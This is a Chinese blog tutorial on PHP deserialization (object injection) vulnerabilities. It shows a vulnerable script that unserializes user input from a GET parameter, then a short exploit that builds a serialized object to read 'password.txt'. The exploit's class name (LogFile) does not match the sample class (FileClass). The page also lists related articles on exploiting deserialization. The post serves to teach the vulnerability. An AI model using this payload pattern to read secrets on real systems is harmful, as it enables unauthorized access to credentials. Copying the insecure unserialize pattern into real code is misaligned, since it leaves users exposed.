php 反序列化漏洞概览

最新推荐文章于 2024-05-29 10:41:34 发布
最新推荐文章于 2024-05-29 10:41:34 发布
阅读量845 收藏
点赞数
分类专栏: Security 文章标签: 安全 序列化与反序列化 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_35957188/article/details/70538328
版权

个人感觉参数可控是很多安全问题的根源

php反序列化漏洞原链接

序列化是啥

就理解成方便数据运输做的一种压缩优化就行

比方说一个

$stooges = array('Moe','Larry','Curly');
$new = serialize($stooges);
print_r($new);
echo "<br />";
print_r(unserialize($new));
结果:
a:3:{i:0;s:3:"Moe";i:1;s:5:"Larry";i:2;s:5:"Curly";}

可以看出来乱七八糟的对象最终简化为字符串

所以可以猜出来咋用了
就是构造语句进行序列化
然后在对应进行反序列化的接口
利用变量可控性执行命令

这个过程中
两个比较注意的地方
一个是
魔术方法

即通过反序列化调用生成对象执行析构函数等
利用接口对应变量的不安全权限
对构造析构toString等方法进行利用

比如web Application 源码如下

<?php
include 'logfile.php';
class FileClass    
{    
    public $filename = 'error.log';      
    public function __toString()    
    {    
        return file_get_contents($this->filename);    
    }    
} 
class User    
{    
    public $age = 0;    
    public $name = '';    
    public function __toString()    
    {    
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';    
    }    
}
$obj = unserialize($_GET['usr_serialized']);
echo $obj;
?>

则可构造利用代码如下生成请求命令

<?php    
include 'logfile.php';    
$obj = new LogFile();    
$obj->filename = 'password.txt';    
echo serialize($obj) . '<br />';   
?>

可见这个例子利用了logfile中filename的低权限接口
通过反序列化调用了新对象toString接口
从而打印了password.txt 的内容

ReZerou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
PHP反序列化专题
goddemon
12-10 791
一,序列化基础知识类 魔术函数:即调用一些函数时,可直接自动调用这些函数 5种类型 __contstruct()函数:被称为构造函数,当实例化类的时候会自动调用该函数构造函数,即当对象创建new时会自动调用。但在反序列化时不会自动调用 __destruct()函数:被称为析构函数,当类结束(对象销毁)的时候自动调用该函数 __sleep()函数:当php进行序列化操作(serialize)的时候自动调用该函数,可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称的数组。如果该方法未返回任何内容,则
php注入源码,深入讲解PHP的对象注入(Object Injection)
weixin_39562197的博客
03-10 518
前言虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP序列化的不正确使用有关。如果你阅读了PHP中的SESSION反序列化机制对序列化就会有一个大致的认识。PHP对象注入其实本质上也是由于序列化引起的。基础知识在php类中可能会存在一些叫做魔术函数(magic 函数),这些函数会在类进行某些事件的时候自动触发,例如__construct()会在一个对象被创建时调用,__destruct()会...
反序列化漏洞复现/PHP session反序列化漏洞原理解析_详细攻防教学
最新发布
程序员六七的博客
05-29 410
本质上,就是一种可以维持服务器端的数据存储技术。即**技术就是一种基于后端有别于数据库的临时存储数据的技术**PHP 工作流程以PHP为例
从[安洵杯2019]iamthinking到thinkphp6.0反序列化漏洞复现
m0_64348326的博客
05-30 488
方法,同时满足条件的属性也是在父类Model构造函数中初始化的。但由于Model是抽象类,无法实例化对象,只能找它的子类Pivot来创建对象,但是父类的属性又必须初始化才能满足条件,所以子类的构造函数必须调用父类的构造函数来初始化父类的属性以满足条件。7.继续跟进getAttr()方法,通过getData()然后返回getValue()方法,最后再该方法中找到命令执行点。由于这是个抽象类,于是查找它子类的save()方法看看能不能有利用的。中的save方法,跟进save()方法,然后我们需要进入。
PHP反序列化漏洞利用及修复,示例代码讲解
白帽子凯哥聊黑客
01-03 1630
您提到的PHP反序列化漏洞是一个重要的网络安全问题。在我的网络安全工程师的角色下,我可以提供关于此问题的深入分析。PHP反序列化漏洞通常发生在当不可信的数据被反序列化时。序列化是将数据结构或对象状态转换为可存储或可传输的格式的过程,而反序列化则是将这些格式转换回原始的数据结构或对象。在PHP中,如果反序列化的数据被恶意篡改,攻击者可以执行任意代码,导致应用程序或系统的安全风险。:当应用程序将不可信的数据传递给函数时,可能产生反序列化漏洞。这可能导致对象注入攻击。
解析PHP对象注入漏洞
Exploit的小站~
02-03 3036
 0、前言 逛乌云知识库的时候看到一篇有趣的译文:http://drops.wooyun.org/papers/4820。 说的是一种注入方式,叫对象注入。对象也能注入? 是的,只要是存在污染数据,没有什么是不可能注入的,但是这个漏洞有点太古怪了,所以我觉得有趣。   1、原理 在程序编写的时候,往往需要序列化一些运行时数据,所谓序列化就是按照一定的格式将运行时数据写入本地文件。
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
Shiro反序列化漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
Java反序列化漏洞介绍书籍
08-17
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在Java应用程序中。反序列化是将已序列化的对象数据转换回其原始对象状态的过程。当这个过程处理不当时,恶意用户可以利用这些漏洞来执行任意代码,从而导致...
PHP反序列化之练习题
shy的博客
11-29 1518
pikachu平台反序列化漏洞 第一题:反序列化漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
php 反序列化漏洞
good good study
01-09 5357
什么是序列化 序列化即 将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象 简单来说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信 。 反序列分为PHP反序列和java反序列化,下面就以PHP反序列化漏洞为切入点,讲述反序列化漏洞核心的原理,其他Java、Python等语言的反序列化漏洞,其原理基本相通。 PHP中的序列化反序列化
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2159
Thinkphp6.0.x反序列化漏洞复现
php反序列化漏洞的复现
qq_30854761的博客
04-25 2218
http://159.75.16.25:8066phpmyadmin scripts/setup.php 反序列化漏洞http://159.75.16.25:8065复现S2-001远程代码执行漏洞复现漏洞要求:(1)操作步骤配截图。 (2)并尝试使用S2-001远程代码执行漏洞进行挂马操作 。 代码被执行由此可见是存在漏洞,可构建payload 获取tomcat运行路径: 获取web运行路径 %{ #req=@org.apac...
安全反序列化(php&java)及漏洞复现
weixin_58954236的博客
09-06 1473
class Stu{在unserialize文件夹下新建一个stu.class.php文件,将上述代码复制进去。class(关键字:类),stu是类名。
漏洞复现篇——PHP反序列化漏洞
爱国小白帽
02-28 4318
简介 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。 什么是序列化和...
反序列化漏洞实例
buffedon的博客
06-10 944
反序列化漏洞实例网页源码测试过程 网页源码 index.php <!DOCTYPE html> <body> <a href="../index.php">их╗п</a></body></html> <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_conte
php反序列化漏洞复现
qq_46527080的博客
01-06 579
主干函数 serialize() //序列化函数 unserialize() //反序列化函数 1.定义:将对象的状态信息转换为可以存储或传输形式的过程(字符串)。将字符传拆分成字符进行传输 序列化的目的是方便数据的传输和存储 2.将拆开的字符拼装成一个完整的 序列化一些字符的含义 a – array 数组 b – boolean 布尔型 d – double 双精度型 i – integer 整型 o – common object 一般对象 r – reference s – str
深入解析PHP反序列化漏洞
"理解PHP反序列化漏洞-berTrAM在漏洞银行大咖面对面的讲解" 在信息安全领域,PHP反序列化漏洞是一种常见的安全问题,它源于PHP序列化反序列化机制。首先,我们需要理解PHP中的类和对象的概念。类是编程中的一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值